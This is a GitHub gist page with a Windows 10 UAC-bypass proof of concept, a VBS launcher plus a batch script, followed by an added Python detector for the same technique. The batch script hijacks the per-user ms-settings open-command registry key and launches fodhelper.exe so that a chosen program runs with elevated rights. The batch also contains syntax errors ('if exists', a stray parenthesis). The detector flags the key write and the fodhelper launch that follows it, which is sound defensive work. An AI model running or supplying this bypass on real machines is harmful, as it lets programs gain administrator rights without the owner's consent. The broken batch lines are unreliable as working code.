@tnhung2011
Last active March 15, 2022 09:19
A Batch concept of a vulnerability in Windows 10 discovered by Cristian B. (Please note: This is a Proof of Concept and is not intended for illegal usage!)
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
@echo off
rem Other bindings:
rem - https://github.com/winscripting/UAC-bypass
rem - https://gist.github.com/tommelo/07dacce52664a35d2938a55d96bc8ac5
set null=
set program=%*
if exists %program% (
rem Create registry structure
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d %null%
reg add /f HKCU\Software\Classes\ms-settings\Shell\Open\command /v (Default) /t REG_SZ /d %program%
rem Perform the bypass
wscript.exe %~dp0\cmdhid.vbs %systemroot%\System32\fodhelper.exe
rem Remove registry structure
timeout 3
reg delete /f HKCU\Software\Classes\ms-settings\
) else (
echo %~nx0: The specified path doesn't exist!
)
)
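
Detection side of the script above, as an added example that is not part of the original gist: it flags value writes under the `ms-settings\Shell\Open\command` key in the per-user Classes hive and raises severity when `fodhelper.exe` starts for the same user shortly afterwards. The event field names, the sample events and the 30-second window are assumptions constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Per-user handler key the script writes to. The second alternative matches the
# HKU\<SID>_Classes form in which registry telemetry commonly reports this hive.
KEY_RE = re.compile(
    r"(?:\\software\\classes|_classes)\\ms-settings\\shell\\open\\command(?:\\|$)", re.I)
WINDOW = timedelta(seconds=30)  # assumed correlation window

# Constructed sample events; field names are hypothetical, not a real log schema.
SAMPLE_EVENTS = [
    {"ts": "2022-03-15T09:00:01", "type": "reg_set", "user": "alice",
     "target": r"HKU\S-1-5-21-1111-1001_Classes\ms-settings\Shell\Open\command\DelegateExecute"},
    {"ts": "2022-03-15T09:00:01", "type": "reg_set", "user": "alice",
     "target": r"HKCU\Software\Classes\ms-settings\Shell\Open\command\(Default)"},
    {"ts": "2022-03-15T09:00:03", "type": "proc_start", "user": "alice",
     "image": r"C:\Windows\System32\fodhelper.exe"},
    # fodhelper.exe started with no preceding key write: not flagged
    {"ts": "2022-03-15T09:05:00", "type": "proc_start", "user": "bob",
     "image": r"C:\Windows\System32\fodhelper.exe"},
    # unrelated Classes write: not flagged
    {"ts": "2022-03-15T09:06:00", "type": "reg_set", "user": "carol",
     "target": r"HKU\S-1-5-21-1111-1003_Classes\.txt\OpenWithProgids\txtfile"},
    # key write with fodhelper.exe only 10 minutes later: write flagged, no correlation
    {"ts": "2022-03-15T09:10:00", "type": "reg_set", "user": "dave",
     "target": r"HKU\S-1-5-21-1111-1004_Classes\ms-settings\shell\open\command\DelegateExecute"},
    {"ts": "2022-03-15T09:20:00", "type": "proc_start", "user": "dave",
     "image": r"C:\Windows\System32\fodhelper.exe"},
]

def detect(events, window=WINDOW):
    """Return (severity, user, detail) findings, in time order."""
    findings = []
    last_write = {}  # user -> time of the most recent write to the watched key
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "reg_set" and KEY_RE.search(ev["target"]):
            last_write[ev["user"]] = ts
            findings.append(("medium", ev["user"], ev["target"]))
        elif ev["type"] == "proc_start" and ev["image"].lower().endswith("\\fodhelper.exe"):
            wrote = last_write.get(ev["user"])
            if wrote is not None and ts - wrote <= window:
                findings.append(("high", ev["user"], ev["image"]))
    return findings

if __name__ == "__main__":
    for severity, user, detail in detect(SAMPLE_EVENTS):
        print(f"{severity:6} {user:6} {detail}")
```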